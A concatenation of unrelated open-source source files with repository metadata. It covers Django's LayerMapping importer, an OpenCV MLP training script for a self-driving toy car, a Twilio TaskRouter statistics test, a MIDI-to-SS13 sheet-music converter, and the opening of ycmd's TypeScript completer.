OGRGeomType('Polygon25D').num: OGRGeomType('MultiPolygon25D'),
}
# Acceptable Django field types and corresponding acceptable OGR
# counterparts.
FIELD_TYPES = {
models.AutoField: OFTInteger,
models.IntegerField: (OFTInteger, OFTReal, OFTString),
models.FloatField: (OFTInteger, OFTReal),
models.DateField: OFTDate,
models.DateTimeField: OFTDateTime,
models.EmailField: OFTString,
models.TimeField: OFTTime,
models.DecimalField: (OFTInteger, OFTReal),
models.CharField: OFTString,
models.SlugField: OFTString,
models.TextField: OFTString,
models.URLField: OFTString,
models.BigIntegerField: (OFTInteger, OFTReal, OFTString),
models.SmallIntegerField: (OFTInteger, OFTReal, OFTString),
models.PositiveSmallIntegerField: (OFTInteger, OFTReal, OFTString),
}
def __init__(self, model, data, mapping, layer=0,
source_srs=None, encoding='utf-8',
transaction_mode='commit_on_success',
transform=True, unique=None, using=None):
"""
A LayerMapping object is initialized using the given Model (not an instance),
a DataSource (or string path to an OGR-supported data file), and a mapping
dictionary. See the module level docstring for more details and keyword
argument usage.
"""
# Getting the DataSource and the associated Layer.
if isinstance(data, six.string_types):
self.ds = DataSource(data, encoding=encoding)
else:
self.ds = data
self.layer = self.ds[layer]
self.using = using if using is not None else router.db_for_write(model)
self.spatial_backend = connections[self.using].ops
# Setting the mapping & model attributes.
self.mapping = mapping
self.model = model
# Checking the layer -- initialization of the object will fail if
# things don't check out before hand.
self.check_layer()
# Getting the geometry column associated with the model (an
# exception will be raised if there is no geometry column).
if connections[self.using].features.supports_transform:
self.geo_field = self.geometry_field()
else:
transform = False
# Checking the source spatial reference system, and getting
# the coordinate transformation object (unless the `transform`
# keyword is set to False)
if transform:
self.source_srs = self.check_srs(source_srs)
self.transform = self.coord_transform()
else:
self.transform = transform
# Setting the encoding for OFTString fields, if specified.
if encoding:
# Making sure the encoding exists, if not a LookupError
# exception will be thrown.
from codecs import lookup
lookup(encoding)
self.encoding = encoding
else:
self.encoding = None
if unique:
self.check_unique(unique)
transaction_mode = 'autocommit' # Has to be set to autocommit.
self.unique = unique
else:
self.unique = None
# Setting the transaction decorator with the function in the
# transaction modes dictionary.
self.transaction_mode = transaction_mode
if transaction_mode == 'autocommit':
self.transaction_decorator = None
elif transaction_mode == 'commit_on_success':
self.transaction_decorator = transaction.atomic
else:
raise LayerMapError('Unrecognized transaction mode: %s' % transaction_mode)
# #### Checking routines used during initialization ####
def check_fid_range(self, fid_range):
"This checks the `fid_range` keyword."
if fid_range:
if isinstance(fid_range, (tuple, list)):
return slice(*fid_range)
elif isinstance(fid_range, slice):
return fid_range
else:
raise TypeError
else:
return None
def check_layer(self):
"""
This checks the Layer metadata, and ensures that it is compatible
with the mapping information and model. Unlike previous revisions,
there is no need to increment through each feature in the Layer.
"""
# The geometry field of the model is set here.
# TODO: Support more than one geometry field / model. However, this
# depends on the GDAL Driver in use.
self.geom_field = False
self.fields = {}
# Getting lists of the field names and the field types available in
# the OGR Layer.
ogr_fields = self.layer.fields
ogr_field_types = self.layer.field_types
# Function for determining if the OGR mapping field is in the Layer.
def check_ogr_fld(ogr_map_fld):
try:
idx = ogr_fields.index(ogr_map_fld)
except ValueError:
raise LayerMapError('Given mapping OGR field "%s" not found in OGR Layer.' % ogr_map_fld)
return idx
# No need to increment through each feature in the model, simply check
# the Layer metadata against what was given in the mapping dictionary.
for field_name, ogr_name in self.mapping.items():
# Ensuring that a corresponding field exists in the model
# for the given field name in the mapping.
try:
model_field = self.model._meta.get_field(field_name)
except FieldDoesNotExist:
raise LayerMapError('Given mapping field "%s" not in given Model fields.' % field_name)
# Getting the string name for the Django field class (e.g., 'PointField').
fld_name = model_field.__class__.__name__
if isinstance(model_field, GeometryField):
if self.geom_field:
raise LayerMapError('LayerMapping does not support more than one GeometryField per model.')
# Getting the coordinate dimension of the geometry field.
coord_dim = model_field.dim
try:
if coord_dim == 3:
gtype = OGRGeomType(ogr_name + '25D')
else:
gtype = OGRGeomType(ogr_name)
except GDALException:
raise LayerMapError('Invalid mapping for GeometryField "%s".' % field_name)
# Making sure that the OGR Layer's Geometry is compatible.
ltype = self.layer.geom_type
if not (ltype.name.startswith(gtype.name) or self.make_multi(ltype, model_field)):
raise LayerMapError('Invalid mapping geometry; model has %s%s, '
'layer geometry type is %s.' %
(fld_name, '(dim=3)' if coord_dim == 3 else '', ltype))
# Setting the `geom_field` attribute w/the name of the model field
# that is a Geometry. Also setting the coordinate dimension
# attribute.
self.geom_field = field_name
self.coord_dim = coord_dim
fields_val = model_field
elif isinstance(model_field, models.ForeignKey):
if isinstance(ogr_name, dict):
# Is every given related model mapping field in the Layer?
rel_model = model_field.rel.to
for rel_name, ogr_field in ogr_name.items():
idx = check_ogr_fld(ogr_field)
try:
rel_model._meta.get_field(rel_name)
except FieldDoesNotExist:
raise LayerMapError('ForeignKey mapping field "%s" not in %s fields.' %
(rel_name, rel_model.__class__.__name__))
fields_val = rel_model
else:
raise TypeError('ForeignKey mapping must be of dictionary type.')
else:
# Is the model field type supported by LayerMapping?
if model_field.__class__ not in self.FIELD_TYPES:
raise LayerMapError('Django field type "%s" has no OGR mapping (yet).' % fld_name)
# Is the OGR field in the Layer?
idx = check_ogr_fld(ogr_name)
ogr_field = ogr_field_types[idx]
# Can the OGR field type be mapped to the Django field type?
if not issubclass(ogr_field, self.FIELD_TYPES[model_field.__class__]):
raise LayerMapError('OGR field "%s" (of type %s) cannot be mapped to Django %s.' %
(ogr_field, ogr_field.__name__, fld_name))
fields_val = model_field
self.fields[field_name] = fields_val
def check_srs(self, source_srs):
"Checks the compatibility of the given spatial reference object."
if isinstance(source_srs, SpatialReference):
sr = source_srs
elif isinstance(source_srs, self.spatial_backend.spatial_ref_sys()):
sr = source_srs.srs
elif isinstance(source_srs, (int, six.string_types)):
sr = SpatialReference(source_srs)
else:
# Otherwise just pulling the SpatialReference from the layer
sr = self.layer.srs
if not sr:
raise LayerMapError('No source reference system defined.')
else:
return sr
def check_unique(self, unique):
"Checks the `unique` keyword parameter -- may be a sequence or string."
if isinstance(unique, (list, tuple)):
# List of fields to determine uniqueness with
for attr in unique:
if attr not in self.mapping:
raise ValueError
elif isinstance(unique, six.string_types):
# Only a single field passed in.
if unique not in self.mapping:
raise ValueError
else:
raise TypeError('Unique keyword argument must be set with a tuple, list, or string.')
# Keyword argument retrieval routines ####
def feature_kwargs(self, feat):
"""
Given an OGR Feature, this will return a dictionary of keyword arguments
for constructing the mapped model.
"""
# The keyword arguments for model construction.
kwargs = {}
# Incrementing through each model field and OGR field in the
# dictionary mapping.
for field_name, ogr_name in self.mapping.items():
model_field = self.fields[field_name]
if isinstance(model_field, GeometryField):
# Verify OGR geometry.
try:
val = self.verify_geom(feat.geom, model_field)
except GDALException:
raise LayerMapError('Could not retrieve geometry from feature.')
elif isinstance(model_field, models.base.ModelBase):
# The related _model_, not a field was passed in -- indicating
# another mapping for the related Model.
val = self.verify_fk(feat, model_field, ogr_name)
else:
# Otherwise, verify OGR Field type.
val = self.verify_ogr_field(feat[ogr_name], model_field)
# Setting the keyword arguments for the field name with the
# value obtained above.
kwargs[field_name] = val
return kwargs
def unique_kwargs(self, kwargs):
"""
Given the feature keyword arguments (from `feature_kwargs`) this routine
will construct and return the uniqueness keyword arguments -- a subset
of the feature kwargs.
"""
if isinstance(self.unique, six.string_types):
return {self.unique: kwargs[self.unique]}
else:
return {fld: kwargs[fld] for fld in self.unique}
# #### Verification routines used in constructing model keyword arguments. ####
def verify_ogr_field(self, ogr_field, model_field):
"""
Verifies if the OGR Field contents are acceptable to the Django
model field. If they are, the verified value is returned,
otherwise the proper exception is raised.
"""
if (isinstance(ogr_field, OFTString) and
isinstance(model_field, (models.CharField, models.TextField))):
if self.encoding:
# The encoding for OGR data sources may be specified here
# (e.g., 'cp437' for Census Bureau boundary files).
val = force_text(ogr_field.value, self.encoding)
else:
val = ogr_field.value
if model_field.max_length and len(val) > model_field.max_length:
raise InvalidString('%s model field maximum string length is %s, given %s characters.' %
(model_field.name, model_field.max_length, len(val)))
elif isinstance(ogr_field, OFTReal) and isinstance(model_field, models.DecimalField):
try:
# Creating an instance of the Decimal value to use.
d = Decimal(str(ogr_field.value))
except DecimalInvalidOperation:
raise InvalidDecimal('Could not construct decimal from: %s' % ogr_field.value)
# Getting the decimal value as a tuple.
dtup = d.as_tuple()
digits = dtup[1]
d_idx = dtup[2] # index where the decimal is
# Maximum amount of precision, or digits to the left of the decimal.
max_prec = model_field.max_digits - model_field.decimal_places
# Getting the digits to the left of the decimal place for the
# given decimal.
if d_idx < 0:
n_prec = len(digits[:d_idx])
else:
n_prec = len(digits) + d_idx
# If we have more than the maximum digits allowed, then throw an
# InvalidDecimal exception.
if n_prec > max_prec:
raise InvalidDecimal(
'A DecimalField with max_digits %d, decimal_places %d must '
'round to an absolute value less than 10^%d.' %
(model_field.max_digits, model_field.decimal_places, max_prec)
)
val = d
elif isinstance(ogr_field, (OFTReal, OFTString)) and isinstance(model_field, models.IntegerField):
# Attempt to convert any OFTReal and OFTString value to an OFTInteger.
try:
val = int(ogr_field.value)
except ValueError:
raise InvalidInteger('Could not construct integer from: %s' % ogr_field.value)
else:
val = ogr_field.value
return val
def verify_fk(self, feat, rel_model, rel_mapping):
"""
Given an OGR Feature, the related model and its dictionary mapping,
this routine will retrieve the related model for the ForeignKey
mapping.
"""
# TODO: It is expensive to retrieve a model for every record --
# explore if an efficient mechanism exists for caching related
# ForeignKey models.
# Constructing and verifying the related model keyword arguments.
fk_kwargs = {}
for field_name, ogr_name in rel_mapping.items():
fk_kwargs[field_name] = self.verify_ogr_field(feat[ogr_name], rel_model._meta.get_field(field_name))
# Attempting to retrieve and return the related model.
try:
return rel_model.objects.using(self.using).get(**fk_kwargs)
except ObjectDoesNotExist:
raise MissingForeignKey(
'No ForeignKey %s model found with keyword arguments: %s' %
(rel_model.__name__, fk_kwargs)
)
def verify_geom(self, geom, model_field):
"""
Verifies the geometry -- will construct and return a GeometryCollection
if necessary (for example if the model field is MultiPolygonField while
the mapped shapefile only contains Polygons).
"""
# Downgrade a 3D geom to a 2D one, if necessary.
if self.coord_dim != geom.coord_dim:
geom.coord_dim = self.coord_dim
if self.make_multi(geom.geom_type, model_field):
# Constructing a multi-geometry type to contain the single geometry
multi_type = self.MULTI_TYPES[geom.geom_type.num]
g = OGRGeometry(multi_type)
g.add(geom)
else:
g = geom
# Transforming the geometry with our Coordinate Transformation object,
# but only if the class variable `transform` is set w/a CoordTransform
# object.
if self.transform:
g.transform(self.transform)
# Returning the WKT of the geometry.
return g.wkt
# #### Other model methods ####
def coord_transform(self):
"Returns the coordinate transformation object."
SpatialRefSys = self.spatial_backend.spatial_ref_sys()
try:
# Getting the target spatial reference system
target_srs = SpatialRefSys.objects.using(self.using).get(srid=self.geo_field.srid).srs
# Creating the CoordTransform object
return CoordTransform(self.source_srs, target_srs)
except Exception as msg:
new_msg = 'Could not translate between the data source and model geometry: %s' % msg
six.reraise(LayerMapError, LayerMapError(new_msg), sys.exc_info()[2])
def geometry_field(self):
"Returns the GeometryField instance associated with the geographic column."
# Use `get_field()` on the model's options so that we
# get the correct field instance if there's model inheritance.
opts = self.model._meta
return opts.get_field(self.geom_field)
def make_multi(self, geom_type, model_field):
"""
Given the OGRGeomType for a geometry and its associated GeometryField,
determine whether the geometry should be turned into a GeometryCollection.
"""
return (geom_type.num in self.MULTI_TYPES and
model_field.__class__.__name__ == 'Multi%s' % geom_type.django)
def save(self, verbose=False, fid_range=False, step=False,
progress=False, silent=False, stream=sys.stdout, strict=False):
"""
Saves the contents from the OGR DataSource Layer into the database
according to the mapping dictionary given at initialization.
Keyword Parameters:
verbose:
If set, information will be printed subsequent to each model save
executed on the database.
fid_range:
May be set with a slice or tuple of (begin, end) feature ID's to map
from the data source. In other words, this keyword enables the user
to selectively import a subset range of features in the geographic
data source.
step:
If set with an integer, transactions will occur at every step
interval. For example, if step=1000, a commit would occur after
the 1,000th feature, the 2,000th feature etc.
progress:
When this keyword is set, status information will be printed giving
the number of features processed and successfully saved. By default,
progress information will pe printed every 1000 features processed,
however, this default may be overridden by setting this keyword with an
integer for the desired interval.
stream:
Status information will be written to this file handle. Defaults to
using `sys.stdout`, but any object with a `write` method is supported.
silent:
By default, non-fatal error notifications are printed to stdout, but
this keyword may be set to disable these notifications.
strict:
Execution of the model mapping will cease upon the first error
encountered. The default behavior is to attempt to continue.
"""
# Getting the default Feature ID range.
default_range = self.check_fid_range(fid_range)
# Setting the progress interval, if requested.
if progress:
if progress is True or not isinstance(progress, int):
progress_interval = 1000
else:
progress_interval = progress
def _save(feat_range=default_range, num_feat=0, num_saved=0):
if feat_range:
layer_iter = self.layer[feat_range]
else:
layer_iter = self.layer
for feat in layer_iter:
num_feat += 1
# Getting the keyword arguments
try:
kwargs = self.feature_kwargs(feat)
except LayerMapError as msg:
# Something borked the validation
if strict:
raise
elif not silent:
stream.write('Ignoring Feature ID %s because: %s\n' % (feat.fid, msg))
else:
# Constructing the model using the keyword args
is_update = False
if self.unique:
# If we want unique models on a particular field, handle the
# geometry appropriately.
try:
# Getting the keyword arguments and retrieving
# the unique model.
u_kwargs = self.unique_kwargs(kwargs)
m = self.model.objects.using(self.using).get(**u_kwargs)
is_update = True
# Getting the geometry (in OGR form), creating
# one from the kwargs WKT, adding in additional
# geometries, and update the attribute with the
# just-updated geometry WKT.
geom = getattr(m, self.geom_field).ogr
new = OGRGeometry(kwargs[self.geom_field])
for g in new:
geom.add(g)
setattr(m, self.geom_field, geom.wkt)
except ObjectDoesNotExist:
# No unique model exists yet, create.
m = self.model(**kwargs)
else:
m = self.model(**kwargs)
try:
# Attempting to save.
m.save(using=self.using)
num_saved += 1
if verbose:
stream.write('%s: %s\n' % ('Updated' if is_update else 'Saved', m))
except Exception as msg:
if strict:
# Bailing out if the `strict` keyword is set.
if not silent:
stream.write(
'Failed to save the feature (id: %s) into the '
'model with the keyword arguments:\n' % feat.fid
)
stream.write('%s\n' % kwargs)
raise
elif not silent:
stream.write('Failed to save %s:\n %s\nContinuing\n' % (kwargs, msg))
# Printing progress information, if requested.
if progress and num_feat % progress_interval == 0:
stream.write('Processed %d features, saved %d ...\n' % (num_feat, num_saved))
# Only used for status output purposes -- incremental saving uses the
# values returned here.
return num_saved, num_feat
if self.transaction_decorator is not None:
_save = self.transaction_decorator(_save)
nfeat = self.layer.num_feat
if step and isinstance(step, int) and step < nfeat:
# Incremental saving is requested at the given interval (step)
if default_range:
raise LayerMapError('The `step` keyword may not be used in conjunction with the `fid_range` keyword.')
beg, num_feat, num_saved = (0, 0, 0)
indices = range(step, nfeat, step)
n_i = len(indices)
for i, end in enumerate(indices):
# Constructing the slice to use for this step; the last slice is
# special (e.g, [100:] instead of [90:100]).
if i + 1 == n_i:
step_slice = slice(beg, None)
else:
step_slice = slice(beg, end)
try:
num_feat, num_saved = _save(step_slice, num_feat, num_saved)
beg = end
except: # Deliberately catch everything
stream.write('%s\nFailed to save slice: %s\n' % ('=-' * 20, step_slice))
raise
else:
# Otherwise, just calling the previously defined _save() function.
_save()
| mit |
aish9r/AutoRCCar | computer/mlp_training.py | 3 | 1864 | __author__ = 'zhengwang'
import cv2
import numpy as np
import glob
print 'Loading training data...'
e0 = cv2.getTickCount()
# load training data
image_array = np.zeros((1, 38400))
label_array = np.zeros((1, 4), 'float')
training_data = glob.glob('training_data/*.npz')
for single_npz in training_data:
with np.load(single_npz) as data:
print data.files
train_temp = data['train']
train_labels_temp = data['train_labels']
print train_temp.shape
print train_labels_temp.shape
image_array = np.vstack((image_array, train_temp))
label_array = np.vstack((label_array, train_labels_temp))
train = image_array[1:, :]
train_labels = label_array[1:, :]
print train.shape
print train_labels.shape
e00 = cv2.getTickCount()
time0 = (e00 - e0)/ cv2.getTickFrequency()
print 'Loading image duration:', time0
# set start time
e1 = cv2.getTickCount()
# create MLP
layer_sizes = np.int32([38400, 32, 4])
model = cv2.ANN_MLP()
model.create(layer_sizes)
criteria = (cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS, 500, 0.0001)
criteria2 = (cv2.TERM_CRITERIA_COUNT, 100, 0.001)
params = dict(term_crit = criteria,
train_method = cv2.ANN_MLP_TRAIN_PARAMS_BACKPROP,
bp_dw_scale = 0.001,
bp_moment_scale = 0.0 )
print 'Training MLP ...'
num_iter = model.train(train, train_labels, None, params = params)
# set end time
e2 = cv2.getTickCount()
time = (e2 - e1)/cv2.getTickFrequency()
print 'Training duration:', time
# save param
model.save('mlp_xml/mlp.xml')
print 'Ran for %d iterations' % num_iter
ret, resp = model.predict(train)
prediction = resp.argmax(-1)
print 'Prediction:', prediction
true_labels = train_labels.argmax(-1)
print 'True labels:', true_labels
print 'Testing...'
train_rate = np.mean(prediction == true_labels)
print 'Train rate: %f:' % (train_rate*100) | bsd-2-clause |
tysonholub/twilio-python | tests/integration/taskrouter/v1/workspace/worker/test_worker_statistics.py | 1 | 3649 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class WorkerStatisticsTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.workers(sid="WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.statistics().fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Workers/WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Statistics',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"cumulative": {
"reservations_created": 100,
"reservations_accepted": 100,
"reservations_rejected": 100,
"reservations_timed_out": 100,
"reservations_canceled": 100,
"reservations_rescinded": 100,
"activity_durations": [
{
"max": 0,
"min": 900,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Offline",
"avg": 1080,
"total": 5400
},
{
"max": 0,
"min": 900,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Busy",
"avg": 1012,
"total": 8100
},
{
"max": 0,
"min": 0,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Idle",
"avg": 0,
"total": 0
},
{
"max": 0,
"min": 0,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Reserved",
"avg": 0,
"total": 0
}
],
"start_time": "2008-01-02T00:00:00Z",
"end_time": "2008-01-02T00:00:00Z"
},
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"worker_sid": "WKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Workers/WKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Statistics"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.workers(sid="WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.statistics().fetch()
self.assertIsNotNone(actual)
| mit |
Incoming5643/-tg-station | tools/midi2piano/midi2piano.py | 89 | 9532 | """
This module allows user to convert MIDI melodies to SS13 sheet music ready
for copy-and-paste
"""
from functools import reduce
import midi as mi
import easygui as egui
import pyperclip as pclip
LINE_LENGTH_LIM = 50
LINES_LIMIT = 200
TICK_LAG = 0.5
OVERALL_IMPORT_LIM = 2*LINE_LENGTH_LIM*LINES_LIMIT
END_OF_LINE_CHAR = """
""" # BYOND can't parse \n and I am forced to define my own NEWLINE char
OCTAVE_TRANSPOSE = 0 # Change here to transpose melodies by octaves
FLOAT_PRECISION = 2 # Change here to allow more or less numbers after dot in floats
OCTAVE_KEYS = 12
HIGHEST_OCTAVE = 8
time_quanta = 100 * TICK_LAG
"""
class Meta():
version = 1.0
integer = 1
anti_integer = -1
maximum = 1000
epsilon = 0.51
delta_epsilon = -0.1
integral = []
tensor = [[],[],[]]
o_complexity = epsilon**2
random_variance = 0.01
"""
# UTILITY FUNCTIONS
def condition(event):
"""
This function check if given MIDI event is meaningful
"""
if event[0] == 'track_name' and event[2] == 'Drums': # Percussion
return False
if event[0] == 'note': # Only thing that matters
return True
return False
def notenum2string(num, accidentals, octaves):
"""
This function converts given notenum to SS13 note according to previous
runs expressed using _accidentals_ and _octaves_
"""
names = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']
convert_table = {1:0, 3:1, 6:2, 8:3, 10:4}
inclusion_table = {0:0, 2:1, 5:2, 7:3, 9:4}
num += OCTAVE_KEYS * OCTAVE_TRANSPOSE
octave = int(num / OCTAVE_KEYS)
if octave < 1 or octave > HIGHEST_OCTAVE:
return ["", accidentals, octaves]
accidentals = accidentals.copy()
octaves = octaves.copy()
output_octaves = list(octaves)
name_indx = num % OCTAVE_KEYS
accidental = (len(names[name_indx]) == 2)
output_octaves[name_indx] = octave
add_n = False
if accidental:
accidentals[convert_table[name_indx]] = True
else:
if name_indx in inclusion_table:
add_n = accidentals[inclusion_table[name_indx]]
accidentals[inclusion_table[name_indx]] = False
return [
(
names[name_indx]+
("n" if add_n else "")+
str((octave if octave != octaves[name_indx] else ""))
),
accidentals,
output_octaves
]
def dur2mod(dur, bpm_mod=1.0):
"""
This functions returns float representation of duration ready to be
added to the note after /
"""
mod = bpm_mod / dur
mod = round(mod, FLOAT_PRECISION)
return str(mod).rstrip('0').rstrip('.')
# END OF UTILITY FUNCTIONS
# CONVERSION FUNCTIONS
def obtain_midi_file():
"""
Asks user to select MIDI and returns this file opened in binary mode for reading
"""
file = egui.fileopenbox(msg='Choose MIDI file to convert',
title='MIDI file selection',
filetypes=[['*.mid', 'MID files']])
if not file:
return None
file = open(file, mode='rb').read()
return file
def midi2score_without_ticks(midi_file):
"""
Transforms aforementioned file into a score, truncates it and returns it
"""
opus = mi.midi2opus(midi_file)
opus = mi.to_millisecs(opus)
score = mi.opus2score(opus)
return score[1:] # Ticks don't matter anymore, it is always 1000
def filter_events_from_score(score):
"""
Filters out irrevelant events and returns new score
"""
return list(map( # For each score track
lambda score_track: list(filter( # Filter irrevelant events
condition,
score_track
)),
score
))
def filter_empty_tracks(score):
"""
Filters out empty tracks and returns new score
"""
return list(filter(
lambda score_track: score_track,
score))
def filter_start_time_and_note_num(score):
"""
Recreates score with only note numbers and start time of each note and returns new score
"""
return list(map(
lambda score_track: list(map(
lambda event: [event[1], event[4]],
score_track)),
score))
def merge_events(score):
"""Merges all tracks together and returns new score"""
return list(reduce(
lambda lst1, lst2: lst1+lst2,
score))
def sort_score_by_event_times(score):
"""Sorts events by start time and returns new score"""
return list(map(
lambda index: score[index],
sorted(
list(range(len(score))),
key=lambda indx: score[indx][0])
))
def convert_into_delta_times(score):
"""
Transform start_time into delta_time and returns new score
"""
return list(map(
lambda super_event: (
[
super_event[1][0]-super_event[0][0],
super_event[0][1]
]), # [ [1, 2], [3, 4] ] -> [ [2, 2] ]
zip(score[:-1], score[1:]) # Shifted association. [1, 2, 3] -> [ (1, 2), (2, 3) ]
))+[[1000, score[-1][1]]] # Add 1 second note to the end
def perform_roundation(score):
"""
Rounds delta times to the nearest multiple of time quanta as BYOND can't
process duration less than that and returns new score
"""
return list(map(
lambda event: [time_quanta*round(event[0]/time_quanta), event[1]],
score))
def obtain_common_duration(score):
"""
Returns the most frequent duration throughout the whole melody
"""
# Parse durations and filter out 0s
durs = list(filter(lambda x: x, list(map(lambda event: event[0], score))))
unique_durs = []
for dur in durs:
if dur not in unique_durs:
unique_durs.append(dur)
# How many such durations occur throughout the melody?
counter = [durs.count(dur) for dur in unique_durs]
highest_counter = max(counter) # Highest counter
dur_n_count = list(zip(durs, counter))
dur_n_count = list(filter(lambda e: e[1] == highest_counter, dur_n_count))
return dur_n_count[0][0] # Will be there
def reduce_score_to_chords(score):
"""
Reforms score into a chord-duration list:
[[chord_notes], duration_of_chord]
and returns it
"""
new_score = []
new_chord = [[], 0]
# [ [chord notes], duration of chord ]
for event in score:
new_chord[0].append(event[1]) # Append new note to the chord
if event[0] == 0:
continue # Add new notes to the chord until non-zero duration is hit
new_chord[1] = event[0] # This is the duration of chord
new_score.append(new_chord) # Append chord to the list
new_chord = [[], 0] # Reset the chord
return new_score
def obtain_sheet_music(score, most_frequent_dur):
"""
Returns unformated sheet music from score
"""
result = ""
octaves = [3 for i in range(12)]
accidentals = [False for i in range(7)]
for event in score:
for note_indx in range(len(event[0])):
data = notenum2string(event[0][note_indx], accidentals, octaves)
result += data[0]
accidentals = data[1]
octaves = data[2]
if note_indx != len(event[0])-1:
result += '-'
if event[1] != most_frequent_dur: # Quarters are default
result += '/'
result += dur2mod(event[1], most_frequent_dur)
result += ','
return result
def explode_sheet_music(sheet_music):
"""
Splits unformatted sheet music into formated lines of LINE_LEN_LIM
and such and returns a list of such lines
"""
split_music = sheet_music.split(',')
split_music = list(map(lambda note: note+',', split_music))
split_list = []
counter = 0
line_counter = 1
for note in split_music:
if line_counter > LINES_LIMIT-1:
break
if counter+len(note) > LINE_LENGTH_LIM-2:
split_list[-1] = split_list[-1].rstrip(',')
split_list[-1] += END_OF_LINE_CHAR
counter = 0
line_counter += 1
split_list.append(note)
counter += len(note)
return split_list
def finalize_sheet_music(split_music, most_frequent_dur):
"""
Recreates sheet music from exploded sheet music, truncates it and returns it
"""
sheet_music = ""
for note in split_music:
sheet_music += note
sheet_music = sheet_music.rstrip(',') # Trim the last ,
sheet_music = "BPM: " + str(int(60000 / most_frequent_dur)) + END_OF_LINE_CHAR + sheet_music
return sheet_music[:min(len(sheet_music), OVERALL_IMPORT_LIM)]
# END OF CONVERSION FUNCTIONS
def main_cycle():
"""
Activate the script
"""
while True:
midi_file = obtain_midi_file()
if not midi_file:
return # Cancel
score = midi2score_without_ticks(midi_file)
score = filter_events_from_score(score)
score = filter_start_time_and_note_num(score)
score = filter_empty_tracks(score)
score = merge_events(score)
score = sort_score_by_event_times(score)
score = convert_into_delta_times(score)
score = perform_roundation(score)
most_frequent_dur = obtain_common_duration(score)
score = reduce_score_to_chords(score)
sheet_music = obtain_sheet_music(score, most_frequent_dur)
split_music = explode_sheet_music(sheet_music)
sheet_music = finalize_sheet_music(split_music, most_frequent_dur)
pclip.copy(sheet_music)
main_cycle()
| agpl-3.0 |
mispencer/ycmd | ycmd/completers/typescript/typescript_completer.py | 1 | 22168 | # Copyright (C) 2015 - 2016 Google Inc.
# 2016 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import * # noqa
import json
import logging
import os
import re
import subprocess
import itertools
import threading
from tempfile import NamedTemporaryFile
from ycmd import responses
from ycmd import utils
from ycmd.completers.completer import Completer
from ycmd.completers.completer_utils import GetFileContents
BINARY_NOT_FOUND_MESSAGE = ( 'TSServer not found. '
'TypeScript 1.5 or higher is required.' )
SERVER_NOT_RUNNING_MESSAGE = 'TSServer is not running.'
MAX_DETAILED_COMPLETIONS = 100
RESPONSE_TIMEOUT_SECONDS = 10
PATH_TO_TSSERVER = utils.FindExecutable( 'tsserver' )
LOGFILE_FORMAT = 'tsserver_'
_logger = logging.getLogger( __name__ )
class DeferredResponse( object ):
"""
A deferred that resolves to a response from TSServer.
"""
def __init__( self, timeout = RESPONSE_TIMEOUT_SECONDS ):
self._event = threading.Event()
self._message = None
self._timeout = timeout
def resolve( self, message ):
self._message = message
self._event.set()
def result( self ):
self._event.wait( timeout = self._timeout )
if not self._event.isSet():
raise RuntimeError( 'Response Timeout' )
message = self._message
if not message[ 'success' ]:
raise RuntimeError( message[ 'message' ] )
if 'body' in message:
return self._message[ 'body' ]
def ShouldEnableTypescriptCompleter():
if not PATH_TO_TSSERVER:
_logger.error( BINARY_NOT_FOUND_MESSAGE )
return False
_logger.info( 'Using TSServer located at {0}'.format( PATH_TO_TSSERVER ) )
return True
class TypeScriptCompleter( Completer ):
"""
Completer for TypeScript.
It uses TSServer which is bundled with TypeScript 1.5
See the protocol here:
https://github.com/Microsoft/TypeScript/blob/2cb0dfd99dc2896958b75e44303d8a7a32e5dc33/src/server/protocol.d.ts
"""
def __init__( self, user_options ):
super( TypeScriptCompleter, self ).__init__( user_options )
self._logfile = None
self._tsserver_handle = None
# Used to prevent threads from concurrently writing to
# the tsserver process' stdin
self._write_lock = threading.Lock()
# Each request sent to tsserver must have a sequence id.
# Responses contain the id sent in the corresponding request.
self._sequenceid = itertools.count()
# Used to prevent threads from concurrently accessing the sequence counter
self._sequenceid_lock = threading.Lock()
self._server_lock = threading.RLock()
# Used to read response only if TSServer is running.
self._tsserver_is_running = threading.Event()
# Start a thread to read response from TSServer.
self._thread = threading.Thread( target = self._ReaderLoop, args = () )
